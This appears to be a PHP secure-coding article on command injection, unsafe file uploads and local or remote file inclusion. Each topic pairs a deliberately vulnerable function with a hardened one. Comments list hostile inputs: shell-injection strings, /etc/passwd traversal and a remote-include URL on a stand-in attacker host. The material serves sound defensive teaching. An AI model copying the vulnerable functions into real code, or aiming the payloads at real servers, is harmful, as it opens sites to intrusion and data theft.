common PHP security mistakes
Date: 2006-10-20 Source: ApexDN
In one of my previous articles, I mentioned the top 5 security
mistakes made in PHP. This article is a follow-up, with some more
common security mistakes.
System Calls
In PHP there are several ways to execute system calls. The system(), exec() and passthru() functions (along with shell_exec() and the backtick operator) all let you run operating-system commands, through a shell, from within your scripts.
Each of these functions, if the input it receives is not checked, also lets a malicious user append shell metacharacters such as ; | & or $( ) to the command line and run commands of his own with the privileges of the web server, possibly reading private files and information (command injection).
Protecting your system from this attack
Input from the user, whatever its context, should never be trusted. PHP provides two functions for this purpose, escapeshellarg() and escapeshellcmd().
The escapeshellarg() function is designed to neutralise any potentially harmful characters in a string that will be passed as a single argument to a system command.
The syntax is as follows: escapeshellarg($arg)
where $arg is the input to clean and the return value is the cleaned string. On Unix systems the function wraps the string in single quotes and escapes any single quotes already in it (each ' becomes '\''), so the shell sees exactly one argument no matter what it contains. On Windows the behaviour differs: the string is wrapped in double quotes and the characters the Windows shell treats specially are replaced with spaces.
escapeshellcmd() is similar, except that it escapes only the characters that have a special meaning to the underlying shell, across the whole command string. Note that it does not escape spaces, so it stops a second command from being chained on but it does not stop an attacker from supplying extra arguments (for instance an option starting with -) to the command you are running. If user input will be used as one entry in the argument list of a system call, escapeshellarg() is always the better choice, and the best choice is to validate the input against a strict allowlist first and keep it out of the shell entirely where you can.
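The following is an added example (not code from the original article) that puts a user-supplied filename into a zip command three ways: unescaped, with escapeshellcmd(), and with escapeshellarg() behind an allowlist. The zip command, the uploads directory and the function names are assumptions made for the illustration.

```php
<?php
// Added example, not from the original article. Assumes the "zip" binary
// is on PATH and that files to compress live in ./uploads (hypothetical).

// Vulnerable: the input is pasted straight into the command line, so a
// filename such as "a.txt; id" or "$(id)" is executed by the shell.
function zip_vulnerable(string $file): ?string
{
    return shell_exec("zip archive.zip " . $file);
}

// Still wrong: escapeshellcmd() escapes ; | & $ and friends in the whole
// string, but leaves spaces alone. "a.txt -r /" therefore reaches zip as
// three arguments (argument injection), not as one filename.
function zip_escapeshellcmd(string $file): ?string
{
    return shell_exec(escapeshellcmd("zip archive.zip " . $file));
}

// Hardened: an allowlist rejects anything that is not a plain filename
// (no slashes, no leading dash that zip could read as an option), the file
// must already exist in the expected directory, and escapeshellarg() turns
// each value into exactly one single-quoted shell argument.
function zip_hardened(string $file): ?string
{
    if (!preg_match('/^[A-Za-z0-9_][A-Za-z0-9_.-]*$/', $file)) {
        return null;                       // refuse, do not try to "clean"
    }
    $path = __DIR__ . '/uploads/' . $file;
    if (!is_file($path)) {
        return null;
    }
    $cmd = 'zip ' . escapeshellarg(__DIR__ . '/archive.zip')
         . ' '   . escapeshellarg($path);
    return shell_exec($cmd);
}

// What escapeshellarg() actually emits for hostile input on Unix: the
// embedded quote is closed, escaped and reopened, so the whole thing is
// still a single argument and "id" is never run.
$hostile = "a.txt'; id; echo '";
echo escapeshellarg($hostile), "\n";   // 'a.txt'\''; id; echo '\'''

// Driver: ?file= comes from the user; only the hardened path is safe.
$result = zip_hardened($_GET['file'] ?? '');
echo $result === null ? "rejected\n" : $result;
```

Run the hardened version with ?file=a.txt;id and it is rejected by the regex before any shell is spawned; run the escapeshellcmd() version with the same input and the semicolon is escaped, but "a.txt -r /" would still pass through to zip as extra arguments.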
File Uploads
PHP will create a temporary file with the uploaded content, but it will not check whether the filename the client supplied is valid, or whether the type and size are what your application expects.
A user could also build his own form and submit it with a field naming some other file on the server that contains sensitive information. If your script trusts a variable it assumes holds the temporary upload path (the classic case being register_globals, where a forged form field could set that variable directly) rather than the path PHP itself recorded, the result is that your script processes that other file.
Solution
Use is_uploaded_file() to confirm that a path really belongs to a file uploaded in the current request, and move_uploaded_file() (which performs that check itself) to move it into place. Beyond that, check the $_FILES superglobal array: look at the error code first, enforce your own size limit, and determine the file type from the content rather than from the client-supplied type field; and never reuse the client-supplied filename as the name on disk.
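Below is an added example (not code from the original article) of an upload handler that applies those checks in order. The form field name "userfile", the uploads directory, the 2 MiB cap and the allowed image types are assumptions for the illustration.

```php
<?php
// Added example, not from the original article. Assumes a form field
// named "userfile" and a writable ./uploads directory (both hypothetical),
// ideally outside the web root or with PHP execution disabled there.

const UPLOAD_DIR = __DIR__ . '/uploads';
const MAX_BYTES  = 2 * 1024 * 1024;                       // 2 MiB cap
const ALLOWED    = ['image/png' => 'png', 'image/jpeg' => 'jpg'];

// Returns [true, stored path] or [false, reason].
function handle_upload(array $files): array
{
    if (!isset($files['userfile']) || !is_array($files['userfile'])) {
        return [false, 'no upload field'];
    }
    $f = $files['userfile'];

    // PHP's own verdict comes first: anything but UPLOAD_ERR_OK means
    // tmp_name is missing or the file was cut short by php.ini limits.
    if ($f['error'] !== UPLOAD_ERR_OK) {
        return [false, 'upload error ' . $f['error']];
    }

    // is_uploaded_file() proves the path was created by this request's
    // upload, not smuggled in to point at a sensitive local file.
    if (!is_uploaded_file($f['tmp_name'])) {
        return [false, 'not an uploaded file'];
    }

    // Enforce the application's own size limit (php.ini limits are global).
    if ($f['size'] > MAX_BYTES || filesize($f['tmp_name']) > MAX_BYTES) {
        return [false, 'too large'];
    }

    // $f['type'] is whatever the client claimed; sniff the content instead.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($f['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        return [false, "unexpected type $mime"];
    }

    // Never store under $f['name']: it may hold "../", a ".php" extension
    // or anything else. Generate the name; take the extension from the
    // sniffed type, not from the client.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];

    // move_uploaded_file() repeats the is_uploaded_file() check and moves
    // the temp file in one step.
    if (!move_uploaded_file($f['tmp_name'], $dest)) {
        return [false, 'move failed'];
    }
    return [true, $dest];
}

[$ok, $info] = handle_upload($_FILES);
http_response_code($ok ? 200 : 400);
echo $info, "\n";
```

The order matters: the error code and is_uploaded_file() checks come before anything reads tmp_name, and the stored name is generated server-side so the client never chooses a path or an extension.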
Including Files
In PHP you can include local or remote files using include(), include_once(), require() and require_once(). This lets you keep classes, reused code and so on in separate files, improving the maintainability and readability of your code.
The concept of including remote files is dangerous in itself, though, because the remote site could be compromised or the network connection could be spoofed. In either scenario you are injecting unknown and possibly hostile code directly into your script. Remote includes should be disabled in php.ini (allow_url_include = Off, which is the default in current PHP versions; allow_url_fopen governs the other remote-file functions).
Another issue to consider is an include whose path depends on user input. An attacker who controls that path can walk the filesystem with ../ sequences and include any file the web server can read (local file inclusion), or, if remote includes are allowed, pull in code from a server he controls (remote file inclusion). The fix is to verify incoming variables against an allowlist of the files you actually intend to include, rather than trying to clean arbitrary paths.
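As an added example (not code from the original article), here is a simple page router whose ?page= parameter selects a template, first in the vulnerable form and then restricted to an allowlist. The templates directory and page names are assumptions for the illustration.

```php
<?php
// Added example, not from the original article. Assumes templates live in
// ./templates and are named home.php, about.php, contact.php (hypothetical).

// Vulnerable: the raw parameter becomes part of the include path.
// ?page=../../../../etc/passwd%00 style traversal (null byte on old PHP)
// or ?page=../../config reads local files; with allow_url_include on,
// ?page=http://attacker.example/evil pulls in remote code.
function render_vulnerable(string $page): void
{
    include __DIR__ . '/templates/' . $page . '.php';
}

// Hardened: map the parameter to a fixed allowlist, so no user-controlled
// bytes ever reach the include path.
const TEMPLATES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_template(string $page): ?string
{
    if (!array_key_exists($page, TEMPLATES)) {
        return null;                    // unknown page: refuse, do not guess
    }
    $base = realpath(__DIR__ . '/templates');
    $real = realpath(__DIR__ . '/templates/' . TEMPLATES[$page]);
    // Belt and braces: the resolved file must still sit under templates/.
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

function render_hardened(string $page): bool
{
    $path = resolve_template($page);
    if ($path === null) {
        http_response_code(404);
        return false;
    }
    require $path;
    return true;
}

// Only allowlisted keys ever reach require; traversal never touches disk.
var_dump(resolve_template('../../etc/passwd'));   // NULL
render_hardened($_GET['page'] ?? 'home');
```

Pair this with allow_url_include = Off in php.ini so that even a bug elsewhere cannot turn a local include into a remote one.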
Conclusion
Don't trust any incoming variables ($_GET, $_POST, $_COOKIE, $_REQUEST, $_FILES, or request headers in $_SERVER).
These can all be set by a malicious user and possibly compromise the security of your system.